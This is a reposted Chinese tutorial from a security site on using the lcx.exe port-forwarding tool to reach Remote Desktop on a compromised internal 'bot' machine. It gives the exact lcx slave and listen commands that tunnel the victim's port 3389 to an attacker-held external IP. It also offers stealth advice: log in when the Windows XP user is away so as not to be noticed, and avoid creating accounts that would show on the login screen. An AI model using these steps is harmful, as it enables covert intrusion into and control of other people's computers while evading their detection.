<button id="ei02c"><ol id="ei02c"></ol></button>
            1. <div id="ei02c"></div>

                    1. 安基網 首頁 安全 滲透測試 查看內容

                      LCX端口轉發實現內網突破

                      2019-3-8 11:02| 投稿: xiaotiger |來自: 互聯網


                      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

                      摘要: 在理論上只要網絡連接的計算機都是可以訪問的,但是在實際中往往由于技術水平等原因,很難實現它;例如局域網中的某臺計算機僅僅開放了Web服務,該服務僅能供內網用戶使用,而外網用戶根本沒有辦法直接訪問。因此要想讓外網用戶能夠訪問局域網中的系統服務,這必須進行端口映射等操作才行。端口映射在 ...
                      在理論上只要網絡連接的計算機都是可以訪問的,但是在實際中往往由于技術水平等原因,很難實現它;例如局域網中的某臺計算機僅僅開放了Web服務,該服務僅能供內網用戶使用,而外網用戶根本沒有辦法直接訪問。因此要想讓外網用戶能夠訪問局域網中的系統服務,這必須進行端口映射等操作才行。端口映射在入侵內網的時候經常用到,特別是要登陸遠程終端服務時,使用端口映射就非常方便。

                      Lcx.exe是一個端口轉發工具,相當于把肉雞A上的3389端口轉發到具有外網IP地址的B機上,這樣連接B機的3389端口就相當于連接A機的3389端口。Lcx程序多用于被控制計算機(肉雞)處于內網的情況,被控制機可能中了木馬程序,雖然能夠進行控制,但還是沒有使用遠程終端登陸到本機進行管理方便,因此在很多情況下,都會想方設法在被控制計算機上開啟3389端口,然后通過lcx等程序進行端口轉發,進而在本地連接到被控制計算機的遠程終端并進行管理和使用。

                      確定被控制計算機的IP地址

                      在被控制計算機上開啟遠程終端,然后執行“ipconfig /all”命令,查看其網絡配置情況,如圖1 所示,該計算機的ip地址為“192.168.80.129”

                      圖1 確定被控制計算機的IP地址

                      在被控制計算機上執行端口轉發命令

                      在被控制計算機上執行“lcx –slave 218.69.*.* 51 192.168.80.129 3389”,如圖2 所示,執行完畢后會給出一些提示,如果顯示為“Make a Connection to 218.69.*.*:51”則表示端口轉發正確。

                      圖2 在被控制計算機上執行轉發命令

                      說明

                      lcx一共有三條命令,第一條命令(lcx –lister 51 3389)是在具有外網獨立IP的計算機上執行,表示在本機上監聽51端口,該端口主要是接受被控制計算機3389端口轉發過來的數據。第二條命令(lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示將本機IP地址為192.168.80.129的3389端口轉發到遠程地址為“218.69.*.*”的51端口。第三條命令是端口轉向。

                      在本機上執行監聽命令

                      在本機上打開DOS命令提示符,然后到lcx.exe程序所在路徑執行“lcx –lister 51 3389”命令,監聽51端口,監聽成功后,會顯示如圖3 所示的數據。

                      圖3 在本機上監聽51端口

                      i注意

                      (1)在本機上監聽的端口必須是未使用的端口,可以使用“netstat -an |find "51" ”命令進行查看,如果沒有顯示結果則表示51端口可以用來進行監聽。

                      (2)被控制計算機與本機成功建立連接后會不停的顯示連接數據,如圖4 所示,如果未出現數據發送和接受的情況,說明連接建立不成功。

                      圖4 成功建立連接

                      在本機使用遠程終端進行登錄

                      在DOS提示符下輸入“mstsc”命令打開遠程終端連接器,輸入“127.0.0.1”后單擊“連接”按鈕進行遠程終端連接,在出現登錄界面后分別收入用戶名和密碼,驗證通過后,即可遠程進入被控制計算機的桌面,如圖5 所示,輸入“ipconfig /all”以及“net user”命令來查看網絡配置情況以及用戶信息。

                      圖5 遠程登入被控制計算機

                      i注意

                      (1)如果被控制計算機是服務器,則在登陸時可以直接進行登陸;如果被控制計算機是Windows XP系統,則最好選擇用戶不在計算機的時間進行登陸,否則容易被發現。

                      (2)不要輕易在被控制計算機上建立賬號,尤其是Windows XP,建立帳號后,會立即在登陸界面中進行顯示。

                      查看本地連接

                      在被控制計算機上使用“netstat -an”查看當前所有的連接時,可以看到被控制計算機時在跟自己進行遠程終端連接,如圖6 所示,而實際的3389端口是跟本機的51端口進行連接的。

                      圖6 查看實際網絡連接

                      小結

                      通過使用lcx端口轉發程序,成功的在本機連入被控制計算機的內網,可以很方便的對該計算機進行遠程管理,在進行內網滲透時尤為有用。Lcx有兩個命令,一個是在本地端執行其命令格式為“lcx –listen 51 2008”,另外一個是在肉雞上執行“lcx –slave 監聽端口的IP地址 監聽端口 肉雞或者被控制端內網IP 3389(默認端口是3389,如果修改了3389端口,則需要將3389換成其修改后的端口即可)”。

                      作者介紹:陳小兵,北京理工大學博士,計算機網絡安全攻防專家,原海軍某部網絡安全研究員、公安部網絡安全攻防實驗員、曾就職于北京公安局網絡安全總隊,主要從事網絡安全攻防研究工作,在網絡安全研究與培訓、病毒防范、網絡滲透等領域具有20年以上經驗,在業內享有盛名。曾出版多本業內權威性著作包括《SQL Server2000培訓教程》《黑客攻防及實戰案例解析》《Web滲透及實戰案例解析》《安全之路-Web滲透及實戰案例解析第二版》、《黑客攻防實戰加密與解密》,在國內核心期刊及普通學術期刊發表論文20余篇。



                      小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

                      本文出自:https://www.toutiao.com/a6665661050483900935/

                      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


                      鮮花

                      握手

                      雷人

                      路過

                      雞蛋

                      相關閱讀

                      最新評論

                       最新
                      返回頂部
                      新疆11选5计算公式